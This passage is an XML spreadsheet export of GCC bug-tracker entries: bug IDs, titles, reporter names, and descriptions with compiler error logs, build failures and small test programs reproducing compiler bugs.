 -D_MIPS_SIM=_ABIN32 -D_MIPS_SZINT=32 -D_MIPS_SZLONG=32 -D_MIPS_SZPTR=32
 -D_COMPILER_VERSION=601 -U__mips -D__mips=3 -D__mips64 gcct2vpt_main.cpp
 gcct2vpt_main.ii
 GNU CPP version 2.95.2 19991024 (release) [AL 1.1 MM 40] SGI running
 IRIX 6.x
 #include ... search starts here:
 #include  search starts here:
  /usr/freeware/lib/gcc-lib/mips-sgi-irix6.2/2.95.2/include/g++
  /usr/local/include
  /usr/freeware/lib/gcc-lib/mips-sgi-irix6.2/2.95.2/include
  /usr/include
 End of search list.
 The following default directories have been omitted from the search
 path:
 /usr/freeware/lib/gcc-lib/mips-sgi-irix6.2/2.95.2/../../../../mips-sgi-irix6.2/include
 End of omitted list.
  /usr/freeware/lib/gcc-lib/mips-sgi-irix6.2/2.95.2/cc1plus
 gcct2vpt_main.ii -quiet -dumpbase gcct2vpt_main.cc -O3 -Wall -version -o
 gcct2vpt_main.s
 GNU C++ version 2.95.2 19991024 (release) (mips-sgi-irix6.2) compiled by
 GNU C version 2.95.2 19991024 (release).
 gcct2vpt_main.cpp: In function `void process()':
 gcct2vpt_main.cpp:230: warning: int format pointer arg (arg 5)
 gcct2vpt_main.cpp:240: Internal compiler error.
 gcct2vpt_main.cpp:240: Please submit a full bug report.
 gcct2vpt_main.cpp:240: See
  for
 instructions.
Release:
2.95.2
How-To-Repeat:
See attachments for gcct2vpt_main.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-49536</t>
  </si>
  <si>
    <t>latent bug with creation of vector of arrays</t>
  </si>
  <si>
    <t>Duncan Sands has determined that http://llvm.org/bugs/show_bug.cgi?id=10042 exposes a bug in FSF gcc where vectors of arrays are being created. He proposes that the following patch to FSF gcc exposes the latent issue...
Index: tree-vect-data-refs.c
===================================================================
--- tree-vect-data-refs.c    (revision 174743)
+++ tree-vect-data-refs.c    (working copy)
@@ -27346 +273410 @@
       scalar_type = TREE_TYPE (DR_REF (dr))
       STMT_VINFO_VECTYPE (stmt_info) =
                 get_vectype_for_scalar_type (scalar_type)
+      gcc_assert(!STMT_VINFO_VECTYPE (stmt_info) ||
+                 TREE_CODE (STMT_VINFO_VECTYPE (stmt_info)) != VECTOR_TYPE ||
+                 TREE_CODE (TREE_TYPE (STMT_VINFO_VECTYPE (stmt_info)))
+                 != ARRAY_TYPE)
       if (!STMT_VINFO_VECTYPE (stmt_info))
         {
           if (vect_print_dump_info (REPORT_UNVECTORIZED_LOCATIONS))
by triggering an assertion failure when the tree-vectorizer tries to form a vector of arrays.</t>
  </si>
  <si>
    <t>GCC-36069</t>
  </si>
  <si>
    <t>Strange warning: suggest parentheses around assignment used as truth value with volatile/non volatile bools</t>
  </si>
  <si>
    <t>When compiling the following file with g++ 4.3.0 with -Wall :
---- main.cpp ----
struct foo {
  bool a
  volatile bool bc  // removing 'volatile' here removes the warning.
  foo() { a = b = c = false }
}
int main() {
  foo A
}
-- end of main.cpp --
-bash-3.00$ g++ main.cpp -Wall
tata.cpp: In constructor 'foo::foo()':
tata.cpp:4: warning: suggest parentheses around assignment used as truth value
It seems that having an assignement between 'volatile' and non-volatile bools
activates the warning. I don't see any reason why it should behave like this.
Removing the volatile keyword (or adding it in the line above) removes the warning.</t>
  </si>
  <si>
    <t>David.Tschumperle</t>
  </si>
  <si>
    <t>GCC-985</t>
  </si>
  <si>
    <t>can't build CVS head - GNU_V3_DEMANGLING_STYLE_STRING undeclared here (not in a function)</t>
  </si>
  <si>
    <t>building the c++ compiler fail on:
if [ x-fpic != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I../../../cvs/gcc/libiberty/../include  -W -Wall -Wtraditional -pedantic -fpic ../../../cvs/gcc/libiberty/cplus-dem.c -o pic/cplus-dem.o \
else true fi
../../../cvs/gcc/libiberty/cplus-dem.c:297: `GNU_V3_DEMANGLING_STYLE_STRING' undeclared here (not in a function)
../../../cvs/gcc/libiberty/cplus-dem.c:297: initializer element is not constant
../../../cvs/gcc/libiberty/cplus-dem.c:297: (near initialization for `libiberty_demanglers[6].demangling_style_name')
../../../cvs/gcc/libiberty/cplus-dem.c:298: `gnu_v3_demangling' undeclared here (not in a function)
../../../cvs/gcc/libiberty/cplus-dem.c:298: initializer element is not constant
../../../cvs/gcc/libiberty/cplus-dem.c:298: (near initialization for `libiberty_demanglers[6].demangling_style')
../../../cvs/gcc/libiberty/cplus-dem.c: In function `cplus_demangle':
../../../cvs/gcc/libiberty/cplus-dem.c:917: `GNU_V3_DEMANGLING' undeclared (first use in this function)
../../../cvs/gcc/libiberty/cplus-dem.c:917: (Each undeclared identifier is reported only once
../../../cvs/gcc/libiberty/cplus-dem.c:917: for each function it appears in.)
../../../cvs/gcc/libiberty/cplus-dem.c:919: warning: implicit declaration of function `cplus_demangle_v3'
../../../cvs/gcc/libiberty/cplus-dem.c:919: warning: assignment makes pointer from integer without a cast
make[1]: *** [cplus-dem.o] Error 1
make[1]: Leaving directory `/home/olivier/buildtmp/gcc/libiberty'
make: *** [all-libiberty] Error 2
Release:
CVS head
Environment:
i686-pc-linux-gnu
How-To-Repeat:
get CVS head as of today (05/12/2000) and 
../../cvs/gcc/configure --prefix=/usr/local/gcc --enable-shared --enable-haifa --enable-threads=posix --enable-languages=c++java --enable-libstdcxx-v3 --disable-new-gxx-abi
make</t>
  </si>
  <si>
    <t>GCC-37353</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE: vector VEC(gimplebase) push domain error in tree_call_cdce at tree-call-cdce.c:890</t>
  </si>
  <si>
    <t>With trunk:
(sid)988:tbm@em64t: ~] /usr/lib/gcc-snapshot/bin/g++ -O2 qucs-hic2_full.core.ii
hic2_full.core.cpp: In member function 'void hic2_full::calcVerilog()':
hic2_full.core.cpp:345: internal compiler error: vector VEC(gimplebase) push domain error in tree_call_cdce at tree-call-cdce.c:890
Please submit a full bug report
with preprocessed source if appropriate.
Works fine at -O</t>
  </si>
  <si>
    <t>GCC-4028</t>
  </si>
  <si>
    <t>gcc 2.96 RH71 throws internal error #19991113 with anonymous union</t>
  </si>
  <si>
    <t>Only gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
 does not crash all more recent versions seems to be flawed. Compiler crashes on anonymous union like the one included. Can be helped by naming the union after which compiler performs flawlessly.
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.1 2.96-85)
Environment:
RH 7.1 on AMD thunderbird intel PIII mobile AMD athlon
How-To-Repeat:
Not quite sure the union in the test is included in a boundschecking class for our memory manager.</t>
  </si>
  <si>
    <t>pb</t>
  </si>
  <si>
    <t>GCC-12434</t>
  </si>
  <si>
    <t>Field called java causes confusion.</t>
  </si>
  <si>
    <t>gcj implements an expression like foo.class by synthesizing a call to
java.lang.class.forName.
The compiler gets a bit confused if you have a field called java.
$ dev/test/bin/gcj -fsyntax-only broken.java
broken.java: In class `broken':
broken.java: In method `class$(java.lang.String)':
broken.java:8: error: Can't make a static reference to nonstatic variable `java'
in class `broken'.
   }
   ^
1 error
It should be possible to fix this by setting RESOLVE_PACKAGE_NAME_P on the
synthesized name and then making sure we don't change that later.  The name
resolution code is interesting though.
The method name on the error message above is interesting too.
class broken {
    int java
    Class foo()
    {
	return broken.class
    }
}</t>
  </si>
  <si>
    <t>suckfish</t>
  </si>
  <si>
    <t>GCC-43406</t>
  </si>
  <si>
    <t>__builtin_popcountll fails with -O0 and -mpopcnt</t>
  </si>
  <si>
    <t>Sample code:
#include 
int main (void)
{
    long long a = 0xFFFFFFFFFFFFLL // 48 bits set
    int popcount
#if 1
    popcount = __builtin_popcountll (a)
#else
    popcount = __popcountdi2 (a)
#endif
    printf (%llx popcount = %d\n a popcount)
    return 0
}
If -mpopcnt is enabled this code only outputs the correct value (48) when -O3 is on (apparently it's calculating it at compile time). Without optimizations it is apparently only counting the bits in the lower dword of the long long variable.
OTOH If __popcountdi2 is used it works correctly (but according to the assembly code it's not really using the popcnt instruction which means it's much slower).
Test runs and output follow (note you need a CPU which supports the popcnt instruction):
=&gt; gcc popcnt.c -o popcnt -Wall -O0 -mpopcnt &amp;&amp; ./popcnt
ffffffffffff popcount = 32
=&gt; gcc popcnt.c -o popcnt -Wall -O3 -mpopcnt &amp;&amp; ./popcnt
ffffffffffff popcount = 48
=&gt; gcc popcnt.c -o popcnt -Wall -O0 &amp;&amp; ./popcnt
ffffffffffff popcount = 48
=&gt; gcc popcnt.c -o popcnt -Wall -O3 &amp;&amp; ./popcnt
ffffffffffff popcount = 48</t>
  </si>
  <si>
    <t>rbarreira</t>
  </si>
  <si>
    <t>GCC-35965</t>
  </si>
  <si>
    <t>[4.3 only] -fstack-protector produces segfaulting binaries on arm/armel</t>
  </si>
  <si>
    <t>-snip-
#include 
main()
{
        printf (Hello World!\n)
}
-snip-
$ gcc -save-temps -fstack-protector -fPIE hello.c -o hello
$ ./hello
$ Hello World!
$ gcc -save-temps -fstack-protector-all -fPIE helloall.c -o helloall
$ ./helloall
$ Segmentation fault
helloall.s segfaults hello.s runs fine. if -fstack-protector isn't to
be supported on arm it gcc should ignore the option like done on
mips/mipsel.
Package source: gcc-4.3
GCC version: 4.3.1
Base Debian version: 4.3
Configured with: -v
         --with-pkgversion='Debian 4.3.0-3'
         --with-bugurl='file:///usr/share/doc/gcc-4.3/README.Bugs'
         --enable-languages=cc++fortranobj-c++
         --prefix=/usr
         --enable-shared
         --with-system-zlib
         --libexecdir=/usr/lib
         --without-included-gettext
         --enable-threads=posix
         --enable-nls
         --with-gxx-include-dir=/usr/include/c++/4.3
         --program-suffix=-4.3
         --enable-clocale=gnu
         --enable-libstdcxx-debug
         --enable-libffi
         --enable-mpfr
         --disable-libssp
         --disable-sjlj-exceptions
         --enable-checking=release
         --build=arm-linux-gnueabi
         --host=arm-linux-gnueabi
         --target=arm-linux-gnueabi
Target: arm-linux-gnueabi
Configured with: ../src/configure linux gnueabi
Thread model: posix
gcc version 4.3.1 20080401 (prerelease) (Debian 4.3.0-3)</t>
  </si>
  <si>
    <t>riku.voipio</t>
  </si>
  <si>
    <t>GCC-43807</t>
  </si>
  <si>
    <t>lm32-elf infinite loop</t>
  </si>
  <si>
    <t>Compiling the attached file with debugging and optimization turned on causes an infinite loop.
How-To-Repeat:
   lm32-elf-gcc -O2 -c timer_list.i</t>
  </si>
  <si>
    <t>GCC-20131</t>
  </si>
  <si>
    <t>[4.0 only] gfortan - incorrectly reads beyond the end of line.</t>
  </si>
  <si>
    <t>I finally realized that this is actually the source of most of the data reading
problems that I have had. If you look at the hex dump of the file the first
line has extra padding blanks and reads correctly. The second line has no
padding and gfortran reads past the end of line and takes data from the third
line and prints it.
[dir:~/tests/gfortran] dir% gfortran -o fread03 fread03.f
[dir:~/tests/gfortran] dir% fread03 &lt; fread03.dat
    1    0
    1    2
STOP 0
[dir:~/tests/gfortran] dir% cat fread03.f
      program main
      do 10 j=12 
      read(51010)  nloadnpr2
      write(61010) nloadnpr2
   10 continue
 1010 format (16i5)
      stop
      end
[dir:~/tests/gfortran] dir% cat fread03.dat
    1          
    1
    2
[dir:~/tests/gfortran] dir% dump -i fread03.dat
   File name: fread03.dat   Block number: 0   Byte number: 0
0000  20 20 20 20 31 20 20 20  20 20 20 20 20 20 20 0a      1           .
0010  20 20 20 20 31 0a 20 20  20 20 32 0a 00 00 00 00      1.     2.
EOF encountered. Do you want to continue ? n</t>
  </si>
  <si>
    <t>GCC-13775</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] Many C++ compile-time regression in 3.4.0 in comparison with 3.3.2</t>
  </si>
  <si>
    <t>Hello
there are many C++ compile-time regression in 3.4.0. I have tested it on MICO's
ORB core sources and provide more detailed information to the gcc developers
list:  http://gcc.gnu.org/ml/gcc/2004-01/msg01458.html
If you are curious please download tarball of preprocessed sources here:
http://www.mico.org/~karel/orb-ii-gcc340_040114.tar.bz2
Cheers
Karel</t>
  </si>
  <si>
    <t>kgardas</t>
  </si>
  <si>
    <t>GCC-8798</t>
  </si>
  <si>
    <t>#include  is including /usr/bin/locale instead of /usr/local/include/c++/3.2.1/locale</t>
  </si>
  <si>
    <t>A #include  leads to /usr/local/include/c++/3.2.1/bits/istream.tcc:37 doing a #include  which then issues a failure on /usr/bin/locale:10:184 and several others.
I don't understand where /usr/bin/locale is coming from.  I tried changing istream.tcc to #include  but same results and changing the  to double quotes also got same result.
Here's the output from the compiler:
======================================
Computing dependencies for mapDispatcher/pingState.cc
In file included from /usr/local/include/c++/3.2.1/bits/istream.tcc:37
                 from /usr/local/include/c++/3.2.1/istream:297
                 from /usr/local/include/c++/3.2.1/iostream:46
                 from /d0/20021203-0635/akamai/common/include/Mapper/Dispatcher/pingState.h:8
                 from /d0/20021203-0635/akamai/mapDispatcher/pingState.cc:9:
/usr/bin/locale:10:184: missing terminating ' character
/usr/bin/locale:28:1089: missing terminating ' character
/usr/bin/locale:43:3674: missing terminating ' character
/usr/bin/locale:58:132: missing terminating ' character
/usr/bin/locale:66:604: missing terminating ' character
/usr/bin/locale:67:544: missing terminating  character
/usr/bin/locale:1:409: possible start of unterminated string literal
In file included from /d0/20021203-0635/akamai/common/include/Mapper/Dispatcher/TPS_Types.h:6
                 from /d0/20021203-0635/akamai/common/include/Mapper/Dispatcher/pingState.h:67
                 from /d0/20021203-0635/akamai/mapDispatcher/pingState.cc:9:
/d0/20021203-0635/akamai/common/include/akamai/utils/ak_icmp.h:224:7: warning: no newline at end of file
ERROR: could not compute dependencies mapDispatcher/pingState.cc
make-3.79.1-aka-2[1]: *** [/d0/20021203-0635/akamai/mapDispatcher/pingState.cc.d] Error 1
Here's the full compiler version:
root@esiejtest3:/usr/local/include/c++/3.2.1# gcc -v
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2.1/specs
Configured with: /usr/local/src/gcc-3.2.1/configure --prefix=/usr/local --with-gun-as --with-gnu-ld
Thread model: posix
gcc version 3.2.1
root@esiejtest3:/usr/local/include/c++/3.2.1# gcc --version
gcc (GCC) 3.2.1
Copyright (C) 2002 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
root@esiejtest3:/usr/local/include/c++/3.2.1#
Release:
gcc version 3.2.1
Environment:
Debian 3.0 (woody) based OS with RedHat Kernel</t>
  </si>
  <si>
    <t>mpeck</t>
  </si>
  <si>
    <t>GCC-5952</t>
  </si>
  <si>
    <t>Re: gnu/gcj/io/shs.cc doesn't compile on Solaris 2.5.1 (bootstrap failure)</t>
  </si>
  <si>
    <t xml:space="preserve"> Rainer Orth  writes:
 &gt; 2002-02-06  Adam Megacz 
 &gt; 
 &gt;         * gnu/gcj/io/shs.h gnu/gcj/io/shs.cc gnu/gcj/io/natSimpleSHSStream.cc:
 &gt;         use uint_t instead of LONG and BYTE
 &gt; 
 &gt; which unconditionally uses uint_t
 Nope check shs.h (included from shs.cc):
   #include
   #if HAVE_INTTYPES_H
   # include 
   #else
   # if HAVE_STDINT_H
   #  include 
   # endif
   #endif
 If your system does not have one of these headers it is not C99
 compliant. GCJ does not build on non-C99-compliant systems.
   - a
 -- 
 If I put copyrighted material into the 'chewy nougat center' I can
  claim the crunchy chocolate coating is an 'Access Control
  Mechanism'.                                     --lynx_user_abroad
 Why Windows NT/2k/XP is unreliable: www.zappadoodle.com
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-71871</t>
  </si>
  <si>
    <t>ICE on mixing templates and vector extensions ternary operator</t>
  </si>
  <si>
    <t>Created attachment 38893
test case
Attached causes an ICE.
$ g++ -c a.cc
a.cc: In function â€˜void foo() [with unsigned int N = 0u]â€™:
a.cc:7:2: internal compiler error: in gimplify_expr at gimplify.c:8858
  x = x ? x : -1
  ^
0x74c6d9 gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../../src/gcc/gimplify.c:8858
0xefc41c internal_get_tmp_var
        ../../src/gcc/gimplify.c:555
0x12b62d1 get_initialized_tmp_var(tree_node* gimple_statement_base** gimple_statement_base**)
        ../../src/gcc/gimplify.c:598
0x12b62d1 gimplify_save_expr
        ../../src/gcc/gimplify.c:4887
0xef8d54 gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../../src/gcc/gimplify.c:8412
0xef80cf gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../../src/gcc/gimplify.c:8228
0x7516c5 gimplify_init_constructor
        ../../src/gcc/gimplify.c:4103
0xefbeb0 gimplify_modify_expr_rhs
        ../../src/gcc/gimplify.c:4274
0xefb4a9 gimplify_modify_expr
        ../../src/gcc/gimplify.c:4603
0xef778f gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../../src/gcc/gimplify.c:8126
0xefc82b gimplify_stmt(tree_node** gimple_statement_base**)
        ../../src/gcc/gimplify.c:5545
0xefc82b gimplify_and_add(tree_node* gimple_statement_base**)
        ../../src/gcc/gimplify.c:423
0xefc82b internal_get_tmp_var
        ../../src/gcc/gimplify.c:568
0xef7c8c get_formal_tmp_var(tree_node* gimple_statement_base**)
        ../../src/gcc/gimplify.c:589
0xef7c8c gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../../src/gcc/gimplify.c:9050
0x74b6d6 gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../../src/gcc/gimplify.c:8844
0xefb54b gimplify_modify_expr
        ../../src/gcc/gimplify.c:4644
0xef778f gimplify_expr(tree_node** gimple_statement_base** gimple_statement_base** bool (*)(tree_node*) int)
        ../../src/gcc/gimplify.c:8126
0xef716e gimplify_stmt(tree_node** gimple_statement_base**)
        ../../src/gcc/gimplify.c:5545
0xef8570 gimplify_cleanup_point_expr
        ../../src/gcc/gimplify.c:5321
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/5/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 5.4.0-6' --with-bugurl=file:///usr/share/doc/gcc-5/README.Bugs --enable-languages=cadac++jau
Thread model: posix
gcc version 5.4.0 20160609 (Debian 5.4.0-6) 
also fails on:
$ g++ -v
Using built-in specs.
COLLECT_GCC=/usr/bin/g++-4.9.real
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.9/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.9.2-10' --with-bugurl=file:///usr/share/doc/gcc-4.9/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.9 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.9 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-vtable-verify --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.9-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --with-arch-32=i586 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.9.2 (Debian 4.9.2-10)</t>
  </si>
  <si>
    <t>mirq-gccboogs</t>
  </si>
  <si>
    <t>GCC-64581</t>
  </si>
  <si>
    <t>[5 Regression] libffi/testsuite/libffi.special/special.exp doesn't use newly built GCC</t>
  </si>
  <si>
    <t>I got
Executing on host: g++ /export/gnu/import/git/sources/gcc/libffi/testsuite/libffi.special/unwindtest.cc   -shared-libgcc -lstdc++ -O0 -W -Wall -I/export/build/gnu/gcc-pie/build-x86_64-linux/x86_64-unknown-linux-gnu/./libffi/include -I/export/gnu/import/git/sources/gcc/libffi/testsuite/../include  -I/export/build/gnu/gcc-pie/build-x86_64-linux/x86_64-unknown-linux-gnu/./libffi/include/.. -L/export/build/gnu/gcc-pie/build-x86_64-linux/x86_64-unknown-linux-gnu/./libffi/.libs  -I/export/gnu/import/git/sources/gcc/libstdc++-v3/include -I/export/gnu/import/git/sources/gcc/libstdc++-v3/include/std -I/export/gnu/import/git/sources/gcc/libstdc++-v3/include/c_std -I/export/gnu/import/git/sources/gcc/libstdc++-v3/libsupc++ -I/export/build/gnu/gcc-pie/build-x86_64-linux/x86_64-unknown-linux-gnu/./libstdc++-v3/include -I/export/build/gnu/gcc-pie/build-x86_64-linux/x86_64-unknown-linux-gnu/./libstdc++-v3/include/x86_64-unknown-linux-gnu -L/export/build/gnu/gcc-pie/build-x86_64-linux/x86_64-unknown-linux-gnu/./libstdc++-v3/src/.libs   -lffi -lm   -o ./unwindtest.exe    (timeout = 300)
It should use ../../gcc/xg++ -B../../gcc/</t>
  </si>
  <si>
    <t>GCC-2870</t>
  </si>
  <si>
    <t>Can't build binary RPM from gcc-snapshot-20010516-1.src.rpm on Red Hat Linux 7.1</t>
  </si>
  <si>
    <t>I downloaded the source RPM of gcc-snapshot-20010516-1.src.rpm
Then I did rpm --rebuild gcc-snapshot-20010516-1.src.rpm and captured a log file. It seems to have finished the configure step but died in the actual recompile. The compressed log file is attached.
Release:
gcc-snapshot-20010516-1.src.rpm
Environment:
Athlon Thunderbird running Red Hat Linux 7.1
rpm --version ==&gt; 4.0.2 rpm -q rpm ==&gt; rpm-4.0.2-8
gcc --version ==&gt; 2.96  rpm -q gcc ==&gt; gcc-2.96-81
How-To-Repeat:
rpm --rebuild gcc-snapshot-20010516-1.src.rpm</t>
  </si>
  <si>
    <t>znmeb</t>
  </si>
  <si>
    <t>GCC-6110</t>
  </si>
  <si>
    <t>[sparc-sun-solaris 2.8]Error message after make install of gcc with c/c++ and 64bit support</t>
  </si>
  <si>
    <t>When trying to compile and install gcc with 64bit support and
c/c++ language-support enabled I get the following error-message after make install:
../../../../gcc-3.0.4/libstdc++-v3/../install-sh -c -d /usr/local/gcc-3.0.4-v9/include/g++-v3
make[6]: ../../../../gcc-3.0.4/libstdc++-v3/../install-sh: Command not found
make[6]: *** [install-data-local] Error 127
make[6]: Leaving directory `/space/gcc-3.0.4-v9/sparcv9-sun-solaris2/sparcv7/libstdc++-v3/include'
make[5]: *** [install-am] Error 2
make[5]: Leaving directory `/space/gcc-3.0.4-v9/sparcv9-sun-solaris2/sparcv7/libstdc++-v3/include'
make[4]: *** [install-recursive] Error 1
make[4]: Leaving directory `/space/gcc-3.0.4-v9/sparcv9-sun-solaris2/sparcv7/libstdc++-v3'
make[3]: *** [multi-do] Error 1
make[3]: Leaving directory `/space/gcc-3.0.4-v9/sparcv9-sun-solaris2/libstdc++-v3'
make[2]: *** [install-multi] Error 2
make[2]: Leaving directory `/space/gcc-3.0.4-v9/sparcv9-sun-solaris2/libstdc++-v3'
make[1]: *** [install-recursive] Error 1
make[1]: Leaving directory `/space/gcc-3.0.4-v9/sparcv9-sun-solaris2/libstdc++-v3'
*** Error code 2
make: Fatal error: Command failed for target `install-target-libstdc++-v3'
This error only occurs when c++ language support and 64 bit support are enabled. I used the following parameters for configure: --prefix=/usr/local/gcc-3.0.4-v9 --enable-languages=cc++ sparcv9-sun-solaris2 --with-ld=/usr/ccs/bin/ld --with-as=/usr/ccs/bin/as.
The error occurs always no matter if I'm using make or gnumake sun's as and ld or binutils.
I have no problems building and installing gcc-3.0.4 with 32 bit support and c/c++ language support or with 64 bit support and c language support only.
Release:
3.0.4
Environment:
Sun Blade 100 Solaris 8 02/02</t>
  </si>
  <si>
    <t>dirk.boeing</t>
  </si>
  <si>
    <t>GCC-7292</t>
  </si>
  <si>
    <t>java.lang.Character.toString(char) should be static</t>
  </si>
  <si>
    <t xml:space="preserve">	java.lang.Character.toString(char) should be static but it isn't.
Release:
3.2 20020710 (experimental)
Environment:
System: Linux churchill 2.4.3-12 #1 Fri Jun 8 15:05:56 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure --prefix=/home/user/jmr/app/gcc
How-To-Repeat:
        Create C.java:
        public class C {
            void f() {
                Character.toString('x')
            }
        }
        gcj -v C.java gives:
        Reading specs from /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.2/specs
        Reading specs from /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.2/../../../libgcj.spec
        rename spec lib to liborig
        Configured with: ./configure --prefix=/home/user/jmr/app/gcc
        Thread model: single
        gcc version 3.2 20020710 (experimental)
         /home/user/jmr/app/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.2/jc1 C.java -fno-use-divide-subroutine -fuse-boehm-gc -fnon-call-exceptions -fkeep-inline-functions -quiet -dumpbase C.java -g1 -version -o /tmp/ccR1HymH.s
        GNU Java version 3.2 20020710 (experimental) (i686-pc-linux-gnu)
                compiled by GNU C version 2.96 20000731 (Red Hat Linux 7.1 2.96-85).
        Class path starts here:
            /home/user/jmr/gcj_test/char/
            /home/user/jmr/app/gcc/share/java/libgcj-3.2.jar/ (system) (zip)
        C.java: In class `C':
        C.java: In method `C.f()':
        C.java:3: error: Can't make static reference to method `java.lang.String java.lang.Character.toString(char)' in class `java.lang.Character'.
                   Character.toString('x')
                            ^
        1 error
        This works with javac and according to the sun javadoc that
        method should be static.
        Workaround is to use String.valueOf(char) instead.</t>
  </si>
  <si>
    <t>GCC-4013</t>
  </si>
  <si>
    <t>g++ 3.0 compilation failure with -mlong-calls and -mthumb</t>
  </si>
  <si>
    <t>g++ 3.0 fails to compile some c++ components. An example is given below. Both the -mlong-calls and -mthumb switches are specified to the compiler.
Release:
g++ 3.0
Environment:
Host: Linux mars 2.2.19-7.0.8 #1 Thu Jun 21 06:28:56 EDT 2001 i686 unknown 
Target: arm-elf
Configured with: /files/parker/src/gcc/gcc-3.0/configure --target=arm-elf --pref
ix=/files/parker/tools --exec-prefix=/files/parker/tools/H-i686-pc-linux --with-
gnu-as --with-gnu-ld --enable-sjlj-exceptions --with-newlib--disable-shared -v
Thread model: single
gcc version 3.0
How-To-Repeat:
Source:
class myClass {
public:
  myClass(){mInt = 0}
  ~myClass(){}
  int GetInt()
private:
  int mInt
  }
int myClass::GetInt(){return mInt}
int cFunc(){
 myClass c1
 return c1.GetInt()
}
Compiler command and output:
bash-2.04$ arm-elf-g++ -mthumb -mlong-calls -Wall -c test.cxx
test.cxx: In function `int cFunc()':
test.cxx:17: Unrecognizable insn:
(call_insn 32 31 34 (parallel[
            (set (reg:SI 0 r0)
                (call (mem:SI (symbol_ref:SI (^_ZN7myClass6GetIntEv)) 0)
                    (const_int 0 [0x0])))
            (use (const_int 1 [0x1]))
            (clobber (reg:SI 14 lr))
        ] ) -1 (nil)
    (expr_list:REG_UNUSED (reg:SI 14 lr)
        (expr_list:REG_EH_REGION (const_int 0 [0x0])
            (nil)))
    (expr_list (use (reg:SI 0 r0))
        (nil)))
test.cxx:17: Internal compiler error in extract_insn at recog.c:2210
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>andy.parker</t>
  </si>
  <si>
    <t>GCC-3173</t>
  </si>
  <si>
    <t>h8300-coff fails to build on gcc-3.0-20010611</t>
  </si>
  <si>
    <t>Build fails with following output
/usr3/ftp_archive/gnu/gcc/ss/b1/b-h8300-coff/gcc/xgcc -B/usr3/ftp_archive/gnu/gc
c/ss/b1/b-h8300-coff/gcc/ -nostdinc -B/usr3/ftp_archive/gnu/gcc/ss/b1/b-h8300-co
ff/h8300-coff/newlib/ -isystem /usr3/ftp_archive/gnu/gcc/ss/b1/b-h8300-coff/h830
0-coff/newlib/targ-include -isystem /usr3/ftp_archive/gnu/gcc/ss/b1/gcc-3.0-2001
0611/newlib/libc/include -B/usr1/tmp-tools/h8300-coff/bin/ -B/usr1/tmp-tools/h83
00-coff/lib/ -isystem /usr1/tmp-tools/h8300-coff/include -O2  -DCROSS_COMPILE -D
IN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isy
stem ./include  -DDF=SF -DDI=SI -g1  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinh
ibit_libc -I. -I. -I../../gcc-3.0-20010611/gcc -I../../gcc-3.0-20010611/gcc/. -I
../../gcc-3.0-20010611/gcc/config -I../../gcc-3.0-20010611/gcc/../include -fexce
ptions -c ../../gcc-3.0-20010611/gcc/unwind-sjlj.c -o libgcc/./unwind-sjlj.o
../../gcc-3.0-20010611/gcc/unwind-sjlj.c: In function `_Unwind_GetRegionStart':
../../gcc-3.0-20010611/gcc/unwind-sjlj.c:200: warning: unused parameter `context
'
../../gcc-3.0-20010611/gcc/unwind-sjlj.c: In function `_Unwind_GetDataRelBase':
../../gcc-3.0-20010611/gcc/unwind-sjlj.c:207: warning: unused parameter `context
'
../../gcc-3.0-20010611/gcc/unwind-sjlj.c: In function `_Unwind_GetTextRelBase':
../../gcc-3.0-20010611/gcc/unwind-sjlj.c:213: warning: unused parameter `context
'
